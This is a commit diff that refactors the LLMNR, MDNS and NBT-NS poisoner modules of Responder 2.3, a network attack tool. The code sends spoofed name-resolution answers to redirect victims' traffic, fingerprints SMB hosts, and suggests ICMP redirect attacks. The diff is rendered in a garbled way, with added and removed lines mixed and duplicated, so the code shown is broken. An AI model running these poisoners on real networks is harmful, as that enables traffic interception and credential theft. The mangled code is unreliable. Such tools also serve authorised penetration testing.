Refactor a bit the poisoners

2025-07-16 10:02:53 -07:00 · 2016-07-05 00:18:48 +02:00 · 2016-07-05 00:18:48 +02:00 · f2a2ffbe87
commit f2a2ffbe87
parent 04c841d34e
5 changed files with 42 additions and 72 deletions
--- a/poisoners/LLMNR.py
+++ b/poisoners/LLMNR.py
@ -14,28 +14,18 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import socket
 import struct
 import settings
 import fingerprint
 from packets import LLMNR_Ans
 from odict import OrderedDict
 from SocketServer import BaseRequestHandler
 from utils import *
 def Parse_LLMNR_Name(data):
 	NameLen = struct.unpack('>B',data[12])[0]
-	Name = data[13:13+NameLen]
+	return data[13:13+NameLen]
 	return Name
 def IsOnTheSameSubnet(ip, net):
 	net += '/24'
 	ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
 	netstr, bits = net.split('/')
 	netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
 	mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
 	return (ipaddr & mask) == (netaddr & mask)
 def IsICMPRedirectPlausible(IP):
 	dnsip = []
@ -43,22 +33,19 @@ def IsICMPRedirectPlausible(IP):
 		ip = line.split()
 		if len(ip) < 2:
 		   continue
-		if ip[0] == 'nameserver':
+		elif ip[0] == 'nameserver':
 			dnsip.extend(ip[1:])
 	for x in dnsip:
-		if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False:
+		if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
 			print color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5)
 			print color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5)
 			print color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5)
 		else:
 			pass
 if settings.Config.AnalyzeMode:
 	IsICMPRedirectPlausible(settings.Config.Bind_To)
 # LLMNR Server class
 class LLMNR(BaseRequestHandler):
 class LLMNR(BaseRequestHandler):  # LLMNR Server class
 	def handle(self):
 		data, soc = self.request
 		Name = Parse_LLMNR_Name(data)
@ -68,24 +55,18 @@ class LLMNR(BaseRequestHandler):
 			return None
 		if data[2:4] == "\x00\x00" and Parse_IPV6_Addr(data):
-
+			Finger = None
 			if settings.Config.Finger_On_Off:
 				Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
 			else:
 				Finger = None
 			# Analyze Mode
 			if settings.Config.AnalyzeMode:
 				LineHeader = "[Analyze mode: LLMNR]"
 				print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
-
+			else:  # Poisoning Mode
 			# Poisoning Mode
 			else:
 				Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
 				Buffer.calculate()
 				soc.sendto(str(Buffer), self.client_address)
 				LineHeader = "[*] [LLMNR]"
 				print color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1)
 			if Finger is not None:
--- a/poisoners/MDNS.py
+++ b/poisoners/MDNS.py
@ -15,8 +15,6 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import struct
 import settings
 import socket
 from SocketServer import BaseRequestHandler
 from packets import MDNS_Ans
@ -33,15 +31,14 @@ def Parse_MDNS_Name(data):
 	except IndexError:
 		return None
 def Poisoned_MDNS_Name(data):
 	data = data[12:]
-	Name = data[:len(data)-5]
+	return data[:len(data)-5]
-	return Name
+
 class MDNS(BaseRequestHandler):
 	def handle(self):
 		MADDR = "224.0.0.251"
 		MPORT = 5353
@ -52,22 +49,15 @@ class MDNS(BaseRequestHandler):
 		if (not Request_Name) or (RespondToThisHost(self.client_address[0], Request_Name) is not True):
 			return None
-		try:
+		if settings.Config.AnalyzeMode:  # Analyze Mode
-			# Analyze Mode
+			if Parse_IPV6_Addr(data):
-			if settings.Config.AnalyzeMode:
+				print text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3)))
-				if Parse_IPV6_Addr(data):
+		else:  # Poisoning Mode
-					print text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3)))
+			if Parse_IPV6_Addr(data):
-			# Poisoning Mode
+				Poisoned_Name = Poisoned_MDNS_Name(data)
-			else:
+				Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=socket.inet_aton(settings.Config.Bind_To))
-				if Parse_IPV6_Addr(data):
+				Buffer.calculate()
-					
+				soc.sendto(str(Buffer), (MADDR, MPORT))
 					Poisoned_Name = Poisoned_MDNS_Name(data)
 					Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=socket.inet_aton(settings.Config.Bind_To))
 					Buffer.calculate()
 					soc.sendto(str(Buffer), (MADDR, MPORT))
 					print color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1)
-		except Exception:
+				print color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1)
 			raise
--- a/poisoners/NBTNS.py
+++ b/poisoners/NBTNS.py
@ -14,8 +14,7 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import socket
+
 import settings
 import fingerprint
 from packets import NBT_Ans
@ -26,20 +25,15 @@ from utils import *
 def Validate_NBT_NS(data):
 	if settings.Config.AnalyzeMode:
 		return False
-
+	elif NBT_NS_Role(data[43:46]) == "File Server":
 	if NBT_NS_Role(data[43:46]) == "File Server":
 		return True
-
+	elif settings.Config.NBTNSDomain:
 	if settings.Config.NBTNSDomain:
 		if NBT_NS_Role(data[43:46]) == "Domain Controller":
 			return True
-
+	elif settings.Config.Wredirect:
 	if settings.Config.Wredirect:
 		if NBT_NS_Role(data[43:46]) == "Workstation/Redirector":
 			return True
-
+	return False
 	else:
 		return False
 # NBT_NS Server class.
 class NBTNS(BaseRequestHandler):
@ -54,19 +48,14 @@ class NBTNS(BaseRequestHandler):
 			return None
 		if data[2:4] == "\x01\x10":
-
+			Finger = None
 			if settings.Config.Finger_On_Off:
 				Finger = fingerprint.RunSmbFinger((self.client_address[0],445))
 			else:
 				Finger = None
-			# Analyze Mode
+			if settings.Config.AnalyzeMode:  # Analyze Mode
 			if settings.Config.AnalyzeMode:
 				LineHeader = "[Analyze mode: NBT-NS]"
 				print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
-
+			else:  # Poisoning Mode
 			# Poisoning Mode
 			else:
 				Buffer = NBT_Ans()
 				Buffer.calculate(data)
 				socket.sendto(str(Buffer), self.client_address)
--- a/settings.py
+++ b/settings.py
@ -14,13 +14,12 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import os
+
 import sys
 import socket
 import utils
 import logging
 import ConfigParser
 from utils import *
 __version__ = 'Responder 2.3'
 class Settings:
--- a/utils.py
+++ b/utils.py
@ -50,6 +50,16 @@ def text(txt):
 	return '\r'+re.sub(r'\[([^]]*)\]', "\033[1;34m[\\1]\033[0m", txt)
 def IsOnTheSameSubnet(ip, net):
 	net += '/24'
 	ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
 	netstr, bits = net.split('/')
 	netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
 	mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
 	return (ipaddr & mask) == (netaddr & mask)
 def RespondToThisIP(ClientIp):
 	if ClientIp.startswith('127.0.0.'):
@ -90,6 +100,7 @@ def OsInterfaceIsSupported():
 		return False if IsOsX() else True
 	else:
 		return False
 def IsOsX():
    Os_version = sys.platform
    if Os_version == "darwin":